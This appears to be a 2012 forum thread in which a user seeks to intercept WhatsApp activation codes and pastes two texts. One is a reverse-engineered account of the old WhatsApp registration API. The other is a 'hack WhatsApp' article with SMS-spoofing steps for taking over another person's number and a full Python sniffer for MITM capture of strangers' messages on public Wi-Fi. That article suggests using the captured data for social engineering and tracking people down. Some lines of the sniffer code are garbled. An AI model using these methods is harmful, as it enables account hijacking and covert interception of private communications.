lmfao Posted February 19, 2012 Share Posted February 19, 2012 So I have heard that whatsap is not encrypted ( its an app like viber) and that when you sign up for a number hte code is generated within your phone sent to whatssapp servers and then sent to you. because it is not encrpted you can intercept it from your phone I have been trying to figure it out for days saw many links, does anyone have any advice ? here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox not sent, but that wont work anymore. A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school. I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it. I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent) I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right: The first thing is the login-Name and the password needed to login: Matching with reports from some other threads here and in other forums the login name I found was some sort of: Code: international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net For example if you live in germany and having the phone number 017612345 it would be email@example.com -> 0049 for germany without the 0's and the phone number without the 0. The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it. I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?) The second thing I searched for is the registration process. With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around) 0) All these API-Request are done with an User-Agent like: Code: WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00 The Code generating this is: http://pastebin.com/K79wrfnS I used information I found in the web to fill the information for the Nokia C3-00. As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you. 1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS) The API-call looks like this: Code: https://r.whatsapp.net/v1/code.php?cc=49&in=17612345&to=4917612345&lc=DE&lg=de&mcc=000&mnc=000&imsi=00000000000000&method=sms The Arguments are as following: cc = area code without 0's in = number without first 0 to = number where the sms or call should go to (maybe security weakness?) lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number" -> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does) The metod is maybe the most interesting thing. There are 3 methods: self, sms and voice When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :> The Answer after calling the API is an xml saying: Code: <code><response status="sucess-sent" result="30"></code> What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^ Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this: Code: WhatsApp code abc abc is the necessary Code 2) With the given code you can then register your Whatsapp-Account API-Call: Code: https://r.whatsapp.net/v1/register.php?cc=49&in=17612345&udid=asdf&code=abc cc/in = the same as in code.php udid = the calculated password as explained in the login-data code = the just recieved WhatsApp-Code The XML response looks like: Code: <register> <response status="ok" login="4917612345" result="new" /> </register> The login-value is your login-Name for the connection and built like explained. I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^ 3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think. API-call: Code: https://r.whatsapp.net/v1/exist.php?cc=49&in=17612345&udid=asdf Parameters are the same like above. Resonse when account with this number and pw exists: Code: <exist><response status="ok" result="4917612345" /></exist> The result again gives the login-name for this account. I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this) The last thing I searced for before studing for my exams was the server connection. It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like. I think there are some small differences between the default XAMPP and the way WhatsApp does it. But nevertheless the URL I found to where it tries to connect is: Code: socket://bin-short.whatsapp.net:5222 When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information. When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server. WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information. The Login-Process in the WhatsApp-Code looks like: Code: out.streamStart(connection.domain, connection.resource); System.err.println("sent stream start"); sendFeatures(); System.err.println("sent features"); sendAuth(); System.err.println("sent auth"); in.streamStart(); System.err.println("read stream start"); String challengeData = readFeaturesAndChallenge(); System.err.println("read features and challenge"); sendResponse(challengeData); System.err.println("sent response"); readSuccess(); Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like: Code: send1(); send2DigestMD5Mechanism(); read1(); String challenge = read2Challenge(); send2SASLResponse(challenge); send2UselessResponse(); read2Challenge(); read2(); send3(); read3(); send4(); send5(); -> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth. Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions. Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU Thats all I did up to now (or more exactly before my exams). I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say ) and then I found this : How to hack WhatsApp Messenger on Nokia, iPhone & Android shareshareshareshare WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down. In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods. The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices. Hack 1 Install WhatsApp on your device WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode. WhatsApp now offers an alternative method of verification Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server. Next we need to do some SMS-Spoofing There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses. If you are using an iPhone use the following details in the SMS spoofer application. To: +447900347295 From: +(Country code)(mobile number) Message: (your email address) If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification. You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number. Hack 2 The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications. You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/ Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for. Example ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 DYN:~/whatsapp# python sniffer.py wlan0 ######################### ## whatsapp sniff v0.1 ## ######################### [+] Interface : wlan0 [+] filter : tcp port 5222 To : *********** Msg : Hello, I will send you a file. To : ********** Filename : .jpg URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg From : *********** Msg : Thanks file has been recieved, take this file too. From : *********** Filename : .jpg URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg Code You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 #!/usr/bin/env python import os import sys import scapy.all import re Previous_Msg = "" Previous_Filename = "" Files =  Messages =  Urls =  def banner(): print "#########################" print "## whatsapp sniff v0.1 ##" print "## firstname.lastname@example.org ##" print "#########################\n" def whatsapp_parse(packet): global Previous_Msg global Previous_Filename global Files global Messages global Urls src = packet.sprintf("%IP.src%") dst = packet.sprintf("%IP.dst%") sport = packet.sprintf("%IP.sport%") dport = packet.sprintf("%IP.dport%") raw = packet.sprintf("%Raw.load%") # Target Sending stuff if dport == "5222": Filename = "" toNumber = "" Url = "" Msg = "" try: toNumber = re.sub("\D", "", raw) if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17] else: toNumber = toNumber[5:16] try: Filename = raw.split("file\\xfc")[1:37] Url = raw.split("file\\xfc").split("\\xa5\\xfc").split("\\xfd\\x00")[1:] except:pass try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[4:-1].decode("string_escape") except:pass except: pass if(len(toNumber) >= 10): if(len(Msg) >= 1 and Previous_Msg != Msg): Previous_Msg = Msg print "To : ", toNumber print "Msg : ", Msg Messages.append(Msg) elif(len(Filename) >= 1 and Previous_Filename != Filename): Previous_Filename = Filename print "To : ", toNumber print "Filename : ", Filename print "URL : ", Url Files.append(Filename) Urls.append(Url) # Recieved Messages if sport == "5222": Msg = "" fromNumber = "" Url = "" Filename = "" try: fromNumber = re.sub("\D", "", raw) if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17] else: fromNumber = fromNumber[5:16] try: Filename = raw.split("file\\xfc")[1:37] Url = raw.split("file\\xfc").split("\\xa5\\xfc").split("\\xfd\\x00")[1:] except: pass try: Msg = raw.split("\\x02\\x16\\xfc")[4:-1].decode("string_escape") except: pass except:pass if(len(fromNumber) = 1 and Previous_Msg != Msg): Previous_Msg = Msg print "From : ", fromNumber print "Msg : ", Msg Messages.append(Msg) elif(len(Filename) >= 1 and Previous_Filename != Filename): Previous_Filename = Filename print "From : ", fromNumber print "Filename : ", Filename print "URL : ", Url Files.append(Filename) Urls.append(Url) def callback(packet): sport = packet.sprintf("%IP.sport%") dport = packet.sprintf("%IP.dport%") raw = packet.sprintf("%Raw.load%") if raw != '??': if dport == "5222" or sport == "5222": whatsapp_parse(packet) def main(): banner() if(len(sys.argv) != 2): print "%s " % sys.argv sys.exit(1) scapy.iface = sys.argv scapy.verb = 0 scapy.promisc = 0 expr = "tcp port 5222" print "[+] Interface : ", scapy.iface print "[+] filter : ", expr scapy.all.sniff(filter=expr, prn=callback, store=0) print "[+] iface %s" % scapy.iface if __name__ == "__main__": main() Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.